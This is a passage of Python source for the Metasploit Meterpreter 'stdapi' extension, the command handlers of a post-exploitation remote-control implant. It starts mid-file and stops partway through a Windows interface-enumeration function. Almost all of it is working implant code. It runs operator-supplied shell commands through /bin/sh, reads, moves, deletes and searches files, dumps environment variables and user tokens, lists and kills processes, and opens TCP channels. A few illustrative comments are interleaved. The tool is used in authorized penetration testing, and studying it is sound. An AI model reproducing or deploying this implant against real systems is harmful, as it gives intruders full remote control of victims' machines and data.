PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
WIN_AF_INET = 2
WIN_AF_INET6 = 23
# Linux Constants
RTM_GETLINK = 18
RTM_GETADDR = 22
RTM_GETROUTE = 26
IFLA_ADDRESS = 1
IFLA_BROADCAST = 2
IFLA_IFNAME = 3
IFLA_MTU = 4
IFA_ADDRESS = 1
IFA_LABEL = 3
meterpreter.register_extension('stdapi')
def calculate_32bit_netmask(bits):
if bits == 32:
return 0xffffffff
return ((0xffffffff << (32-(bits%32))) & 0xffffffff)
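# Example (illustrative): a CIDR prefix length becomes the matching 32-bit
# mask, e.g. calculate_32bit_netmask(24) == 0xffffff00 and
# calculate_32bit_netmask(32) == 0xffffffff.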
def cstruct_unpack(structure, raw_data):
if not isinstance(structure, ctypes.Structure):
structure = structure()
ctypes.memmove(ctypes.byref(structure), raw_data, ctypes.sizeof(structure))
return structure
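# Example usage (illustrative): copy raw bytes into a ctypes structure, as is
# done below for netlink and iphlpapi responses. 'BBBBi' matches IFADDRMSG's
# four uint8 fields followed by an int32:
#
#     raw = struct.pack('BBBBi', socket.AF_INET, 24, 0, 0, 2)
#     msg = cstruct_unpack(IFADDRMSG, raw)
#     # msg.family == socket.AF_INET, msg.prefixlen == 24, msg.index == 2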
def get_stat_buffer(path):
si = os.stat(path)
rdev = 0
if hasattr(si, 'st_rdev'):
rdev = si.st_rdev
blksize = 0
if hasattr(si, 'st_blksize'):
blksize = si.st_blksize
blocks = 0
if hasattr(si, 'st_blocks'):
blocks = si.st_blocks
st_buf = struct.pack('<IHHH', si.st_dev, min(0xffff, si.st_ino), si.st_mode, si.st_nlink)
st_buf += struct.pack('<HHHI', si.st_uid & 0xffff, si.st_gid & 0xffff, 0, rdev)
st_buf += struct.pack('<IIII', si.st_size, long(si.st_atime), long(si.st_mtime), long(si.st_ctime))
st_buf += struct.pack('<II', blksize, blocks)
return st_buf
def get_token_user(handle):
TOKEN_QUERY = 0x0008
TokenUser = 1
advapi32 = ctypes.windll.advapi32
advapi32.OpenProcessToken.argtypes = [ctypes.c_void_p, ctypes.c_uint32, ctypes.POINTER(ctypes.c_void_p)]
token_handle = ctypes.c_void_p()
if not advapi32.OpenProcessToken(handle, TOKEN_QUERY, ctypes.byref(token_handle)):
return None
token_user_buffer = (ctypes.c_byte * 4096)()
dw_returned = ctypes.c_uint32()
result = advapi32.GetTokenInformation(token_handle, TokenUser, ctypes.byref(token_user_buffer), ctypes.sizeof(token_user_buffer), ctypes.byref(dw_returned))
ctypes.windll.kernel32.CloseHandle(token_handle)
if not result:
return None
return cstruct_unpack(TOKEN_USER, token_user_buffer)
def get_username_from_token(token_user):
user = (ctypes.c_char * 512)()
domain = (ctypes.c_char * 512)()
user_len = ctypes.c_uint32()
user_len.value = ctypes.sizeof(user)
domain_len = ctypes.c_uint32()
domain_len.value = ctypes.sizeof(domain)
use = ctypes.c_ulong()
use.value = 0
if not ctypes.windll.advapi32.LookupAccountSidA(None, token_user.User.Sid, user, ctypes.byref(user_len), domain, ctypes.byref(domain_len), ctypes.byref(use)):
return None
return str(ctypes.string_at(domain)) + '\\' + str(ctypes.string_at(user))
def netlink_request(req_type):
import select
# See RFC 3549
NLM_F_REQUEST = 0x0001
NLM_F_ROOT = 0x0100
NLMSG_ERROR = 0x0002
NLMSG_DONE = 0x0003
sock = socket.socket(socket.AF_NETLINK, socket.SOCK_RAW, socket.NETLINK_ROUTE)
sock.bind((os.getpid(), 0))
seq = int(time.time())
nlmsg = struct.pack('IHHIIB15x', 32, req_type, (NLM_F_REQUEST | NLM_F_ROOT), seq, 0, socket.AF_UNSPEC)
sock.send(nlmsg)
responses = []
if not len(select.select([sock.fileno()], [], [], 0.5)[0]):
return responses
raw_response_data = sock.recv(0xfffff)
response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)])
raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):]
while response.type != NLMSG_DONE:
if response.type == NLMSG_ERROR:
break
response_data = raw_response_data[:(response.len - 16)]
responses.append(response_data)
raw_response_data = raw_response_data[len(response_data):]
if not len(raw_response_data):
if not len(select.select([sock.fileno()], [], [], 0.5)[0]):
break
raw_response_data = sock.recv(0xfffff)
response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)])
raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):]
sock.close()
return responses
def resolve_host(hostname, family):
address_info = socket.getaddrinfo(hostname, 0, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP)[0]
family = address_info[0]
address = address_info[4][0]
return {'family':family, 'address':address, 'packed_address':inet_pton(family, address)}
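# Example (illustrative): resolve_host('localhost', socket.AF_INET) returns
# something like {'family': socket.AF_INET, 'address': '127.0.0.1',
# 'packed_address': b'\x7f\x00\x00\x01'}; inet_pton is supplied elsewhere in
# this module.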
def windll_GetNativeSystemInfo():
if not has_windll:
return None
sysinfo = SYSTEM_INFO()
ctypes.windll.kernel32.GetNativeSystemInfo(ctypes.byref(sysinfo))
return {0:PROCESS_ARCH_X86, 6:PROCESS_ARCH_IA64, 9:PROCESS_ARCH_X64}.get(sysinfo.wProcessorArchitecture, PROCESS_ARCH_UNKNOWN)
def windll_GetVersion():
if not has_windll:
return None
dwVersion = ctypes.windll.kernel32.GetVersion()
dwMajorVersion = (dwVersion & 0x000000ff)
dwMinorVersion = ((dwVersion & 0x0000ff00) >> 8)
dwBuild = ((dwVersion & 0xffff0000) >> 16)
return type('Version', (object,), dict(dwMajorVersion = dwMajorVersion, dwMinorVersion = dwMinorVersion, dwBuild = dwBuild))
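# Example decode (illustrative): a dwVersion of 0x23f00206 unpacks via the
# masks above to dwMajorVersion == 6, dwMinorVersion == 2 and
# dwBuild == 0x23f0 (9200), i.e. a Windows 8 / Server 2012 kernel.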
@meterpreter.register_function
def channel_open_stdapi_fs_file(request, response):
fpath = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
fmode = packet_get_tlv(request, TLV_TYPE_FILE_MODE)
if fmode:
fmode = fmode['value']
fmode = fmode.replace('bb', 'b')
else:
fmode = 'rb'
file_h = open(unicode(fpath), fmode)
channel_id = meterpreter.add_channel(MeterpreterFile(file_h))
response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
return ERROR_SUCCESS, response
@meterpreter.register_function
def channel_open_stdapi_net_tcp_client(request, response):
host = packet_get_tlv(request, TLV_TYPE_PEER_HOST)['value']
port = packet_get_tlv(request, TLV_TYPE_PEER_PORT)['value']
local_host = packet_get_tlv(request, TLV_TYPE_LOCAL_HOST)
local_port = packet_get_tlv(request, TLV_TYPE_LOCAL_PORT)
retries = packet_get_tlv(request, TLV_TYPE_CONNECT_RETRIES).get('value', 1)
connected = False
for i in range(retries + 1):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3.0)
if local_host.get('value') and local_port.get('value'):
sock.bind((local_host['value'], local_port['value']))
try:
sock.connect((host, port))
connected = True
break
except:
pass
if not connected:
return ERROR_CONNECTION_ERROR, response
channel_id = meterpreter.add_channel(MeterpreterSocketClient(sock))
response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
return ERROR_SUCCESS, response
@meterpreter.register_function
def channel_open_stdapi_net_tcp_server(request, response):
local_host = packet_get_tlv(request, TLV_TYPE_LOCAL_HOST).get('value', '0.0.0.0')
local_port = packet_get_tlv(request, TLV_TYPE_LOCAL_PORT)['value']
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_sock.bind((local_host, local_port))
server_sock.listen(socket.SOMAXCONN)
channel_id = meterpreter.add_channel(MeterpreterSocketServer(server_sock))
response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_config_getenv(request, response):
for env_var in packet_enum_tlvs(request, TLV_TYPE_ENV_VARIABLE):
pgroup = bytes()
env_var = env_var['value']
env_var = env_var.replace('%', '')
env_var = env_var.replace('$', '')
env_val = os.environ.get(env_var)
if env_val:
pgroup += tlv_pack(TLV_TYPE_ENV_VARIABLE, env_var)
pgroup += tlv_pack(TLV_TYPE_ENV_VALUE, env_val)
response += tlv_pack(TLV_TYPE_ENV_GROUP, pgroup)
return ERROR_SUCCESS, response
@meterpreter.register_function_windll
def stdapi_sys_config_getsid(request, response):
token = get_token_user(ctypes.windll.kernel32.GetCurrentProcess())
if not token:
return error_result_windows(), response
sid_str = ctypes.c_char_p()
if not ctypes.windll.advapi32.ConvertSidToStringSidA(token.User.Sid, ctypes.byref(sid_str)):
return error_result_windows(), response
sid_str = str(ctypes.string_at(sid_str))
response += tlv_pack(TLV_TYPE_SID, sid_str)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_config_getuid(request, response):
if has_pwd:
username = pwd.getpwuid(os.getuid()).pw_name
elif has_windll:
token = get_token_user(ctypes.windll.kernel32.GetCurrentProcess())
if not token:
return error_result_windows(), response
username = get_username_from_token(token)
if not username:
return error_result_windows(), response
else:
username = getpass.getuser()
response += tlv_pack(TLV_TYPE_USER_NAME, username)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_config_sysinfo(request, response):
uname_info = platform.uname()
response += tlv_pack(TLV_TYPE_COMPUTER_NAME, uname_info[1])
response += tlv_pack(TLV_TYPE_OS_NAME, uname_info[0] + ' ' + uname_info[2] + ' ' + uname_info[3])
arch = uname_info[4]
if has_windll:
arch = windll_GetNativeSystemInfo()
if arch == PROCESS_ARCH_IA64:
arch = 'IA64'
elif arch == PROCESS_ARCH_X64:
arch = 'x86_64'
elif arch == PROCESS_ARCH_X86:
arch = 'x86'
else:
arch = uname_info[4]
response += tlv_pack(TLV_TYPE_ARCHITECTURE, arch)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_process_close(request, response):
proc_h_id = packet_get_tlv(request, TLV_TYPE_HANDLE)
if not proc_h_id:
return ERROR_SUCCESS, response
proc_h_id = proc_h_id['value']
del meterpreter.processes[proc_h_id]
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_process_execute(request, response):
cmd = packet_get_tlv(request, TLV_TYPE_PROCESS_PATH)['value']
raw_args = packet_get_tlv(request, TLV_TYPE_PROCESS_ARGUMENTS)
if raw_args:
raw_args = raw_args['value']
else:
raw_args = ""
flags = packet_get_tlv(request, TLV_TYPE_PROCESS_FLAGS)['value']
if len(cmd) == 0:
return ERROR_FAILURE, response
if os.path.isfile('/bin/sh'):
args = ['/bin/sh', '-c', cmd + ' ' + raw_args]
else:
args = [cmd]
args.extend(shlex.split(raw_args))
if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED):
if has_pty:
master, slave = pty.openpty()
if has_termios:
settings = termios.tcgetattr(master)
settings[3] = settings[3] & ~termios.ECHO
termios.tcsetattr(master, termios.TCSADRAIN, settings)
proc_h = STDProcess(args, stdin=slave, stdout=slave, stderr=slave, bufsize=0)
proc_h.stdin = os.fdopen(master, 'wb')
proc_h.stdout = os.fdopen(master, 'rb')
proc_h.stderr = open(os.devnull, 'rb')
else:
proc_h = STDProcess(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
proc_h.echo_protection = True
proc_h.start()
else:
proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
proc_h_id = meterpreter.add_process(proc_h)
response += tlv_pack(TLV_TYPE_PID, proc_h.pid)
response += tlv_pack(TLV_TYPE_PROCESS_HANDLE, proc_h_id)
if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED):
channel_id = meterpreter.add_channel(proc_h)
response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_process_getpid(request, response):
response += tlv_pack(TLV_TYPE_PID, os.getpid())
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_process_kill(request, response):
for pid in packet_enum_tlvs(request, TLV_TYPE_PID):
pid = pid['value']
if has_windll:
k32 = ctypes.windll.kernel32
proc_h = k32.OpenProcess(PROCESS_TERMINATE, False, pid)
if not proc_h:
return error_result_windows(), response
if not k32.TerminateProcess(proc_h, 0):
return error_result_windows(), response
elif hasattr(os, 'kill'):
os.kill(pid, 9)
else:
return ERROR_FAILURE, response
return ERROR_SUCCESS, response
def stdapi_sys_process_get_processes_via_proc(request, response):
for pid in os.listdir('/proc'):
pgroup = bytes()
if not os.path.isdir(os.path.join('/proc', pid)) or not pid.isdigit():
continue
cmdline_file = open(os.path.join('/proc', pid, 'cmdline'), 'rb')
cmd = str(cmdline_file.read(512).replace(NULL_BYTE, bytes(' ', 'UTF-8')))
status_data = str(open(os.path.join('/proc', pid, 'status'), 'rb').read())
status_data = map(lambda x: x.split('\t',1), status_data.split('\n'))
status = {}
for k, v in filter(lambda x: len(x) == 2, status_data):
status[k[:-1]] = v.strip()
ppid = status.get('PPid')
uid = status.get('Uid').split('\t', 1)[0]
if has_pwd:
uid = pwd.getpwuid(int(uid)).pw_name
if cmd:
pname = os.path.basename(cmd.split(' ', 1)[0])
ppath = cmd
else:
pname = '[' + status['Name'] + ']'
ppath = ''
pgroup += tlv_pack(TLV_TYPE_PID, int(pid))
if ppid:
pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(ppid))
pgroup += tlv_pack(TLV_TYPE_USER_NAME, uid)
pgroup += tlv_pack(TLV_TYPE_PROCESS_NAME, pname)
pgroup += tlv_pack(TLV_TYPE_PROCESS_PATH, ppath)
response += tlv_pack(TLV_TYPE_PROCESS_GROUP, pgroup)
return ERROR_SUCCESS, response
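# Illustrative /proc example: for a status file containing lines such as
# "Name:\tbash", "PPid:\t123" and "Uid:\t1000\t1000\t1000\t1000", the loop
# above builds status == {'Name': 'bash', 'PPid': '123', ...} and, with a
# cmdline of "/bin/bash\x00-l\x00", reports a pname of 'bash' and a ppath of
# '/bin/bash -l'.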
def stdapi_sys_process_get_processes_via_ps(request, response):
ps_args = ['ps', 'ax', '-w', '-o', 'pid,ppid,user,command']
proc_h = subprocess.Popen(ps_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
ps_output = str(proc_h.stdout.read())
ps_output = ps_output.split('\n')
ps_output.pop(0)
for process in ps_output:
process = process.split()
if len(process) < 4:
break
pgroup = bytes()
pgroup += tlv_pack(TLV_TYPE_PID, int(process[0]))
pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(process[1]))
pgroup += tlv_pack(TLV_TYPE_USER_NAME, process[2])
pgroup += tlv_pack(TLV_TYPE_PROCESS_NAME, os.path.basename(process[3]))
pgroup += tlv_pack(TLV_TYPE_PROCESS_PATH, ' '.join(process[3:]))
response += tlv_pack(TLV_TYPE_PROCESS_GROUP, pgroup)
return ERROR_SUCCESS, response
def stdapi_sys_process_get_processes_via_windll(request, response):
TH32CS_SNAPPROCESS = 2
TOKEN_QUERY = 0x0008
TokenUser = 1
k32 = ctypes.windll.kernel32
pe32 = PROCESSENTRY32()
pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)
proc_snap = k32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
result = k32.Process32First(proc_snap, ctypes.byref(pe32))
if not result:
return error_result_windows(), response
while result:
proc_h = k32.OpenProcess((PROCESS_QUERY_INFORMATION | PROCESS_VM_READ), False, pe32.th32ProcessID)
if not proc_h:
proc_h = k32.OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pe32.th32ProcessID)
exe_path = (ctypes.c_char * 1024)()
success = False
if hasattr(ctypes.windll.psapi, 'GetModuleFileNameExA'):
success = ctypes.windll.psapi.GetModuleFileNameExA(proc_h, 0, exe_path, ctypes.sizeof(exe_path))
elif hasattr(k32, 'GetModuleFileNameExA'):
success = k32.GetModuleFileNameExA(proc_h, 0, exe_path, ctypes.sizeof(exe_path))
if not success and hasattr(k32, 'QueryFullProcessImageNameA'):
dw_sz = ctypes.c_uint32()
dw_sz.value = ctypes.sizeof(exe_path)
success = k32.QueryFullProcessImageNameA(proc_h, 0, exe_path, ctypes.byref(dw_sz))
if not success and hasattr(ctypes.windll.psapi, 'GetProcessImageFileNameA'):
success = ctypes.windll.psapi.GetProcessImageFileNameA(proc_h, exe_path, ctypes.sizeof(exe_path))
if success:
exe_path = ctypes.string_at(exe_path)
else:
exe_path = ''
process_username = ''
process_token_user = get_token_user(proc_h)
if process_token_user:
process_username = get_username_from_token(process_token_user) or ''
parch = windll_GetNativeSystemInfo()
is_wow64 = ctypes.c_ubyte()
is_wow64.value = 0
if hasattr(k32, 'IsWow64Process'):
if k32.IsWow64Process(proc_h, ctypes.byref(is_wow64)):
if is_wow64.value:
parch = PROCESS_ARCH_X86
pgroup = bytes()
pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID)
pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID)
pgroup += tlv_pack(TLV_TYPE_USER_NAME, process_username)
pgroup += tlv_pack(TLV_TYPE_PROCESS_NAME, pe32.szExeFile)
pgroup += tlv_pack(TLV_TYPE_PROCESS_PATH, exe_path)
pgroup += tlv_pack(TLV_TYPE_PROCESS_ARCH, parch)
response += tlv_pack(TLV_TYPE_PROCESS_GROUP, pgroup)
result = k32.Process32Next(proc_snap, ctypes.byref(pe32))
k32.CloseHandle(proc_h)
k32.CloseHandle(proc_snap)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_process_get_processes(request, response):
if os.path.isdir('/proc'):
return stdapi_sys_process_get_processes_via_proc(request, response)
elif has_windll:
return stdapi_sys_process_get_processes_via_windll(request, response)
else:
return stdapi_sys_process_get_processes_via_ps(request, response)
return ERROR_FAILURE, response
@meterpreter.register_function
def stdapi_fs_chdir(request, response):
wd = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
os.chdir(unicode(wd))
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_delete(request, response):
file_path = packet_get_tlv(request, TLV_TYPE_FILE_NAME)['value']
os.unlink(unicode(file_path))
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_delete_dir(request, response):
dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
dir_path = unicode(dir_path)
if os.path.islink(dir_path):
del_func = os.unlink
else:
del_func = shutil.rmtree
del_func(dir_path)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_delete_file(request, response):
file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
os.unlink(unicode(file_path))
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_file_expand_path(request, response):
path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
if has_windll:
path_tlv = ctypes.create_string_buffer(bytes(path_tlv, 'UTF-8'))
path_out = (ctypes.c_char * 4096)()
path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(ctypes.byref(path_tlv), ctypes.byref(path_out), ctypes.sizeof(path_out))
result = str(ctypes.string_at(path_out))
elif path_tlv == '%COMSPEC%':
result = '/bin/sh'
elif path_tlv in ['%TEMP%', '%TMP%']:
result = '/tmp'
else:
result = os.getenv(path_tlv, path_tlv)
if not result:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_FILE_PATH, result)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_file_move(request, response):
oldname = packet_get_tlv(request, TLV_TYPE_FILE_NAME)['value']
newname = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
os.rename(unicode(oldname), unicode(newname))
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_getwd(request, response):
if hasattr(os, 'getcwdu'):
wd = os.getcwdu()
else:
wd = os.getcwd()
response += tlv_pack(TLV_TYPE_DIRECTORY_PATH, wd)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_ls(request, response):
path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
path = os.path.abspath(unicode(path))
glob = '*'
if any((c in ['*','[','?']) for c in path):
glob = os.path.basename(path)
path = os.path.dirname(path)
for file_name in filter(lambda f: fnmatch.fnmatch(f, glob), os.listdir(path)):
file_path = os.path.join(path, file_name)
response += tlv_pack(TLV_TYPE_FILE_NAME, file_name)
response += tlv_pack(TLV_TYPE_FILE_PATH, file_path)
response += tlv_pack(TLV_TYPE_STAT_BUF, get_stat_buffer(file_path))
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_md5(request, response):
try:
import hashlib
m = hashlib.md5()
except ImportError:
import md5
m = md5.new()
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
m.update(open(path, 'rb').read())
response += tlv_pack(TLV_TYPE_FILE_HASH, m.digest())
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_mkdir(request, response):
dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
dir_path = unicode(dir_path)
if not os.path.isdir(dir_path):
os.mkdir(dir_path)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_search(request, response):
search_root = packet_get_tlv(request, TLV_TYPE_SEARCH_ROOT).get('value', '.')
search_root = (search_root or '.') # sometimes it's an empty string
search_root = unicode(search_root)
glob = packet_get_tlv(request, TLV_TYPE_SEARCH_GLOB)['value']
recurse = packet_get_tlv(request, TLV_TYPE_SEARCH_RECURSE)['value']
if recurse:
for root, dirs, files in os.walk(search_root):
for f in filter(lambda f: fnmatch.fnmatch(f, glob), files):
file_tlv = bytes()
file_tlv += tlv_pack(TLV_TYPE_FILE_PATH, root)
file_tlv += tlv_pack(TLV_TYPE_FILE_NAME, f)
file_tlv += tlv_pack(TLV_TYPE_FILE_SIZE, os.stat(os.path.join(root, f)).st_size)
response += tlv_pack(TLV_TYPE_SEARCH_RESULTS, file_tlv)
else:
for f in filter(lambda f: fnmatch.fnmatch(f, glob), os.listdir(search_root)):
file_tlv = bytes()
file_tlv += tlv_pack(TLV_TYPE_FILE_PATH, search_root)
file_tlv += tlv_pack(TLV_TYPE_FILE_NAME, f)
file_tlv += tlv_pack(TLV_TYPE_FILE_SIZE, os.stat(os.path.join(search_root, f)).st_size)
response += tlv_pack(TLV_TYPE_SEARCH_RESULTS, file_tlv)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_separator(request, response):
response += tlv_pack(TLV_TYPE_STRING, os.sep)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_sha1(request, response):
try:
import hashlib
m = hashlib.sha1()
except ImportError:
import sha
m = sha.new()
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
m.update(open(path, 'rb').read())
response += tlv_pack(TLV_TYPE_FILE_HASH, m.digest())
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_stat(request, response):
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
st_buf = get_stat_buffer(unicode(path))
response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_config_get_interfaces(request, response):
if hasattr(socket, 'AF_NETLINK') and hasattr(socket, 'NETLINK_ROUTE'):
interfaces = stdapi_net_config_get_interfaces_via_netlink()
elif has_osxsc:
interfaces = stdapi_net_config_get_interfaces_via_osxsc()
elif has_windll:
interfaces = stdapi_net_config_get_interfaces_via_windll()
else:
return ERROR_FAILURE, response
for iface_info in interfaces:
iface_tlv = bytes()
iface_tlv += tlv_pack(TLV_TYPE_MAC_NAME, iface_info.get('name', 'Unknown'))
iface_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, iface_info.get('hw_addr', '\x00\x00\x00\x00\x00\x00'))
if 'mtu' in iface_info:
iface_tlv += tlv_pack(TLV_TYPE_INTERFACE_MTU, iface_info['mtu'])
if 'flags' in iface_info:
iface_tlv += tlv_pack(TLV_TYPE_INTERFACE_FLAGS, iface_info['flags'])
iface_tlv += tlv_pack(TLV_TYPE_INTERFACE_INDEX, iface_info['index'])
for address in iface_info.get('addrs', []):
iface_tlv += tlv_pack(TLV_TYPE_IP, address[1])
if isinstance(address[2], (int, long)):
iface_tlv += tlv_pack(TLV_TYPE_IP_PREFIX, address[2])
else:
iface_tlv += tlv_pack(TLV_TYPE_NETMASK, address[2])
response += tlv_pack(TLV_TYPE_NETWORK_INTERFACE, iface_tlv)
return ERROR_SUCCESS, response
def stdapi_net_config_get_interfaces_via_netlink():
rta_align = lambda l: l+3 & ~3
iface_flags = {
0x0001: 'UP',
0x0002: 'BROADCAST',
0x0008: 'LOOPBACK',
0x0010: 'POINTTOPOINT',
0x0040: 'RUNNING',
0x0100: 'PROMISC',
0x1000: 'MULTICAST'
}
iface_flags_sorted = list(iface_flags.keys())
# Dictionaries don't maintain order
iface_flags_sorted.sort()
interfaces = {}
responses = netlink_request(RTM_GETLINK)
for res_data in responses:
iface = cstruct_unpack(IFINFOMSG, res_data)
iface_info = {'index':iface.index}
flags = []
for flag in iface_flags_sorted:
if (iface.flags & flag):
flags.append(iface_flags[flag])
iface_info['flags'] = ' '.join(flags)
cursor = ctypes.sizeof(IFINFOMSG)
while cursor < len(res_data):
attribute = cstruct_unpack(RTATTR, res_data[cursor:])
at_len = attribute.len
attr_data = res_data[cursor + ctypes.sizeof(RTATTR):(cursor + at_len)]
cursor += rta_align(at_len)
if attribute.type == IFLA_ADDRESS:
iface_info['hw_addr'] = attr_data
elif attribute.type == IFLA_IFNAME:
iface_info['name'] = attr_data
elif attribute.type == IFLA_MTU:
iface_info['mtu'] = struct.unpack('<I', attr_data)[0]
interfaces[iface.index] = iface_info
responses = netlink_request(RTM_GETADDR)
for res_data in responses:
iface = cstruct_unpack(IFADDRMSG, res_data)
if not iface.family in (socket.AF_INET, socket.AF_INET6):
continue
iface_info = interfaces.get(iface.index, {})
cursor = ctypes.sizeof(IFADDRMSG)
while cursor < len(res_data):
attribute = cstruct_unpack(RTATTR, res_data[cursor:])
at_len = attribute.len
attr_data = res_data[cursor + ctypes.sizeof(RTATTR):(cursor + at_len)]
cursor += rta_align(at_len)
if attribute.type == IFA_ADDRESS:
nm_bits = iface.prefixlen
if iface.family == socket.AF_INET:
netmask = struct.pack('!I', calculate_32bit_netmask(nm_bits))
else:
if nm_bits >= 96:
netmask = struct.pack('!iiiI', -1, -1, -1, calculate_32bit_netmask(nm_bits))
elif nm_bits >= 64:
netmask = struct.pack('!iiII', -1, -1, calculate_32bit_netmask(nm_bits), 0)
elif nm_bits >= 32:
netmask = struct.pack('!iIII', -1, calculate_32bit_netmask(nm_bits), 0, 0)
else:
netmask = struct.pack('!IIII', calculate_32bit_netmask(nm_bits), 0, 0, 0)
addr_list = iface_info.get('addrs', [])
addr_list.append((iface.family, attr_data, netmask))
iface_info['addrs'] = addr_list
elif attribute.type == IFA_LABEL:
iface_info['name'] = attr_data
interfaces[iface.index] = iface_info
return interfaces.values()
def stdapi_net_config_get_interfaces_via_osxsc():
ds = osxsc.SCDynamicStoreCreate(None, 'GetInterfaceInformation', None, None)
entities = []
entities.append(osxsc.SCDynamicStoreKeyCreateNetworkInterfaceEntity(None, osxsc.kSCDynamicStoreDomainState, osxsc.kSCCompAnyRegex, osxsc.kSCEntNetIPv4))
entities.append(osxsc.SCDynamicStoreKeyCreateNetworkInterfaceEntity(None, osxsc.kSCDynamicStoreDomainState, osxsc.kSCCompAnyRegex, osxsc.kSCEntNetIPv6))
patterns = osxsc.CFArrayCreate(None, entities, len(entities), osxsc.kCFTypeArrayCallBacks)
values = osxsc.SCDynamicStoreCopyMultiple(ds, None, patterns)
interfaces = {}
for key, value in values.items():
iface_name = key.split('/')[3]
iface_info = interfaces.get(iface_name, {})
iface_info['name'] = str(iface_name)
if key.endswith('IPv4'):
family = socket.AF_INET
elif key.endswith('IPv6'):
family = socket.AF_INET6
else:
continue
iface_addresses = iface_info.get('addrs', [])
for idx in range(len(value['Addresses'])):
if family == socket.AF_INET:
iface_addresses.append((family, inet_pton(family, value['Addresses'][idx]), inet_pton(family, value['SubnetMasks'][idx])))
else:
iface_addresses.append((family, inet_pton(family, value['Addresses'][idx]), value['PrefixLength'][idx]))
iface_info['addrs'] = iface_addresses
interfaces[iface_name] = iface_info
for iface_ref in osxsc.SCNetworkInterfaceCopyAll():
iface_name = osxsc.SCNetworkInterfaceGetBSDName(iface_ref)
if not iface_name in interfaces:
iface_type = osxsc.SCNetworkInterfaceGetInterfaceType(iface_ref)
if not iface_type in ['Ethernet', 'IEEE80211']:
continue
interfaces[iface_name] = {'name': str(iface_name)}
iface_info = interfaces[iface_name]
mtu = osxsc.SCNetworkInterfaceCopyMTU(iface_ref, None, None, None)[1]
iface_info['mtu'] = mtu
hw_addr = osxsc.SCNetworkInterfaceGetHardwareAddressString(iface_ref)
if hw_addr:
hw_addr = hw_addr.replace(':', '')
hw_addr = hw_addr.decode('hex')
iface_info['hw_addr'] = hw_addr
ifnames = list(interfaces.keys())
ifnames.sort()
for iface_name, iface_info in interfaces.items():
iface_info['index'] = ifnames.index(iface_name)
return interfaces.values()
def stdapi_net_config_get_interfaces_via_windll():
iphlpapi = ctypes.windll.iphlpapi
if not hasattr(iphlpapi, 'GetAdaptersAddresses'):
return stdapi_net_config_get_interfaces_via_windll_mib()
Flags = (GAA_FLAG_INCLUDE_PREFIX | GAA_FLAG_SKIP_DNS_SERVER | GAA_FLAG_SKIP_MULTICAST | GAA_FLAG_SKIP_ANYCAST)
AdapterAddresses = ctypes.c_void_p()
SizePointer = ctypes.c_ulong()
SizePointer.value = 0
